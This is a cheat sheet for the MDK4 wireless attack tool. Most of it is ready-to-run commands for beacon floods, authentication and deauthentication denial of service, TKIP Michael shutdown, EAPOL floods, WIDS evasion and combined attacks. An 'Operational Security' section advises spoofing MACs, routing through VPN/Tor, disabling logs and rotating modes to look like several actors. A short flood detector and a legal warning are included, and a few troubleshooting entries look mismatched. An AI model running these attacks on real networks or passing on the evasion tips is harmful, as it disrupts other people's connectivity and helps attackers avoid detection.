MDK4
Installation
# Install dependencies (Ubuntu/Debian)
sudo apt-get install build-essential libpcap-dev aircrack-ng
# Clone and compile MDK4
git clone https://github.com/aircrack-ng/mdk4.git
cd mdk4
make
sudo make install
# Verify installation
mdk4 --version
Monitor Mode Setup
# Check wireless interfaces
iwconfig
ip link show
# Enable monitor mode on wlan0
sudo airmon-ng start wlan0
# Or manually with iw (creates wlan0mon)
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
# Verify monitor mode active
iwconfig
# Output should show "Mode:Monitor"
# Disable monitor mode
sudo airmon-ng stop wlan0mon
# Or manually revert
sudo ip link set wlan0 down
sudo iw dev wlan0 set type managed
sudo ip link set wlan0 up
Basic Usage
# Help and version info
mdk4 --help
mdk4 --version
# List available attack modes
mdk4 wlan0mon --help
# General syntax
mdk4 <interface> <attack_mode> [options] <target>
Attack Modes
Beacon Flood (b)
Flood network with fake beacons, creating ghost networks and confusing clients.
# Basic beacon flood on all channels
mdk4 wlan0mon b
# Beacon flood with custom SSID file
mdk4 wlan0mon b -f ssid_list.txt
# Flood specific channel
mdk4 wlan0mon b -c 6
# Flood multiple channels
mdk4 wlan0mon b -c 1,6,11
# Set beacon interval (milliseconds)
mdk4 wlan0mon b -i 100
# Specify output interface (if multiple)
mdk4 wlan0mon b -B wlan0mon
Authentication DoS (a)
Flood target with authentication requests, exhausting AP resources.
# Basic authentication DoS
mdk4 wlan0mon a -t <target_BSSID>
# Auth DoS on specific channel
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -c 6
# Flood with custom auth rate (packets/sec)
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -n 100
# Target multiple APs
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -t 11:22:33:44:55:66
SSID Probing (p)
Broadcast probe requests for networks in a wordlist, testing for hidden SSIDs.
# Probe with SSID list
mdk4 wlan0mon p -f wordlist.txt
# Probe specific SSID
mdk4 wlan0mon p -s "MyNetwork"
# Probe on single channel
mdk4 wlan0mon p -f wordlist.txt -c 6
# Specify probe interval (milliseconds)
mdk4 wlan0mon p -f wordlist.txt -i 50
Deauthentication/Disassociation (d)
Force clients to disconnect from target AP.
# Deauth all clients on target AP
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF
# Deauth specific client
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66
# Deauth with custom frame count
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 -n 100
# Deauth on specific channel
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -C 6
Michael Shutdown (m)
Trigger Michael frame errors to disable TKIP encryption and force downgrade.
# Basic Michael shutdown
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF
# Michael attack on specific client
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66
# Set attack rate
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF -n 100
EAPOL Start (e)
Send EAPOL Start frames to initiate authentication handshakes.
# Basic EAPOL Start flood
mdk4 wlan0mon e -t AA:BB:CC:DD:EE:FF
# EAPOL with custom source MAC
mdk4 wlan0mon e -t AA:BB:CC:DD:EE:FF -s 00:11:22:33:44:55
# Set EAPOL interval
mdk4 wlan0mon e -t AA:BB:CC:DD:EE:FF -i 50
WIDS/IPS Evasion (w)
Exploit WIDS (Wireless Intrusion Detection) by sending fuzzy/malformed frames.
# WIDS confusion mode
mdk4 wlan0mon w -t AA:BB:CC:DD:EE:FF
# Fuzzy frame generation
mdk4 wlan0mon w -t AA:BB:CC:DD:EE:FF --fuzzy
# Target specific WIDS sensor
mdk4 wlan0mon w -t AA:BB:CC:DD:EE:FF -c 6
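Seen from the monitoring side, the beacon (b), authentication (a) and deauthentication (d) floods above show up as abnormal management-frame rates. The detector below is an added example, not part of the original cheat sheet or of MDK4; the thresholds, the one-second window and the sample frames are constructed assumptions.

```python
from collections import defaultdict, deque

# Management subtypes behind the modes above: beacon (b), auth (a), deauth/disassoc (d).
WATCHED = {8: "beacon", 10: "disassoc", 11: "auth", 12: "deauth"}
# Assumed per-window limits; derive real ones from a baseline capture of the site.
LIMITS = {"beacon": 20, "disassoc": 10, "auth": 30, "deauth": 10}
WINDOW = 1.0  # seconds

def parse_mgmt(frame):
    """Return (kind, source, bssid) for a watched management frame, else None."""
    if len(frame) < 24 or (frame[0] >> 2) & 0x3 != 0 or frame[0] >> 4 not in WATCHED:
        return None                      # truncated, or not a watched management frame
    return WATCHED[frame[0] >> 4], frame[10:16].hex(":"), frame[16:22].hex(":")

def detect(frames):
    """frames: (timestamp, 802.11 frame without radiotap), in capture order."""
    windows, alerts = defaultdict(deque), set()
    for ts, frame in frames:
        parsed = parse_mgmt(frame)
        if parsed is None:
            continue
        kind, _source, bssid = parsed
        # Bucket by targeted BSSID, not source MAC, so a rotating source still
        # accumulates. Beacons share one bucket, measured in distinct BSSIDs.
        key = (kind, "*") if kind == "beacon" else (kind, bssid)
        win = windows[key]
        win.append((ts, bssid))
        while ts - win[0][0] > WINDOW:
            win.popleft()
        seen = len({b for _, b in win}) if kind == "beacon" else len(win)
        if seen > LIMITS[kind]:
            alerts.add(key)
    return alerts

def build(subtype, dst, src, bssid):
    """Constructed 24-byte management header (test input, not a real capture)."""
    return bytes([subtype << 4, 0]) + b"\x00\x00" + dst + src + bssid + b"\x00\x00"

def sample():
    ap, bcast, legit = bytes.fromhex("aabbccddeeff"), b"\xff" * 6, bytes.fromhex("020000000099")
    ghosts = [bytes([2, 0, 0, 0, 1, i]) for i in range(25)]
    frames = [(i * 0.03, build(12, bcast, bytes([2, 0, 0, 0, 0, i]), ap)) for i in range(15)]
    frames += [(1 + i * 0.02, build(8, bcast, g, g)) for i, g in enumerate(ghosts)]
    frames += [(2 + i * 0.1, build(8, bcast, legit, legit)) for i in range(30)]
    return frames

print(sorted(detect(sample())))
```

Rate alerts like these pair with 802.11w Protected Management Frames, which make clients discard spoofed deauthentication and disassociation frames.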
Targeting and Filtering
# Target specific AP by BSSID
mdk4 wlan0mon b -t AA:BB:CC:DD:EE:FF
# Target specific client MAC
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66
# Exclude specific BSSID
mdk4 wlan0mon b --bssid-file exclude.txt
# Target by SSID name (if known)
mdk4 wlan0mon d -s "TargetNetwork"
# Multiple targets
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -t 11:22:33:44:55:66 -t 99:88:77:66:55:44
Channel Selection and Frequency
# Single channel
mdk4 wlan0mon b -c 6
# Multiple channels
mdk4 wlan0mon b -c 1,6,11,36,40,44,48
# All 2.4GHz channels
mdk4 wlan0mon b -c 1-13
# 5GHz UNII bands
mdk4 wlan0mon b -c 36-165
# No channel restriction (all bands)
mdk4 wlan0mon b
Rate Control and Timing
# Set frame rate (packets per second)
mdk4 wlan0mon b -n 1000
# Millisecond interval between frames
mdk4 wlan0mon b -i 10
# Slow rate for OPSEC
mdk4 wlan0mon b -n 50 -i 100
# Aggressive rate
mdk4 wlan0mon b -n 5000 -i 1
MAC Spoofing and Source Control
# Custom source MAC for beacons
mdk4 wlan0mon b -s 00:11:22:33:44:55
# Random MAC per frame
mdk4 wlan0mon b --random-mac
# Fixed BSSID in beacons
mdk4 wlan0mon b -B AA:BB:CC:DD:EE:FF
Advanced Options
# Verbose output
mdk4 wlan0mon b -v
# Show packet details
mdk4 wlan0mon b -d
# Duration/time limit (seconds)
timeout 300 mdk4 wlan0mon b
# Output to file for analysis
mdk4 wlan0mon b -o attack.log
# Background execution
mdk4 wlan0mon b &
OPSEC and Legal Considerations
Legal Warning
MDK4 performs DoS attacks against wireless networks. Only use it on networks you own or have explicit written permission to test. Unauthorized use violates:
- Computer Fraud and Abuse Act (CFAA) in the US
- Computer Misuse Act in the UK
- Similar laws in most jurisdictions
Operational Security
# Use VPN/Tor if testing remote networks (never your home IP)
# Spoof MAC address to avoid tracking
sudo macchanger -r wlan0mon
# Use minimal output to reduce detection
mdk4 wlan0mon b -c 6 > /dev/null
# Disable logging of attacks
mdk4 wlan0mon b --nolog
# Time attacks during high traffic periods
# Launch during peak hours (less suspicious)
# Exit cleanly and restore interface
sudo airmon-ng stop wlan0mon
sudo systemctl restart networking
Detection Avoidance
- Vary attack parameters (channels, rates, timing)
- Avoid flooding from single source MAC
- Rotate attack modes to appear as multiple actors
- Do not target production networks during business hours
- Leave adequate gaps between attacks
- Monitor for WIDS alerts during testing
Combined Attack Scenarios
# Multi-channel beacon flood with custom SSIDs
mdk4 wlan0mon b -f wordlist.txt -c 1-13 -n 500
# Deauth + beacon flood (run in parallel)
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF &
mdk4 wlan0mon b -c 6 &
wait
# SSID enumeration + probe analysis
mdk4 wlan0mon p -f wordlist.txt -v
# Michael shutdown before deauth
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF &
sleep 5
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF &
wait
Troubleshooting
| Issue | Solution |
|---|---|
| "wlan0mon: No such device" | Run sudo airmon-ng start wlan0 to create the monitor interface |
| Attacks fail silently | Check iwconfig for Monitor mode, verify channel, try -v flag |
| High CPU usage | Reduce rate (-n) or interval (-i) values |
| Packets not sending | Disable software encryption: sudo rfkill unblock all |
| Cannot target specific AP | Verify BSSID with sudo airodump-ng wlan0mon first |
| Connection to WIDS/IPS | Use fuzzy mode (w --fuzzy) or vary channels/rates |
Related Tools
- aircrack-ng — Full WiFi security suite (airodump, aireplay, airmon)
- hashcat — Password cracking for captured handshakes
- Wireshark — Packet analysis and inspection
- hcxdumptool — Extract hash-mode 22000 from PCAP for hashcat
- hostapd — Create rogue AP for evil twin attacks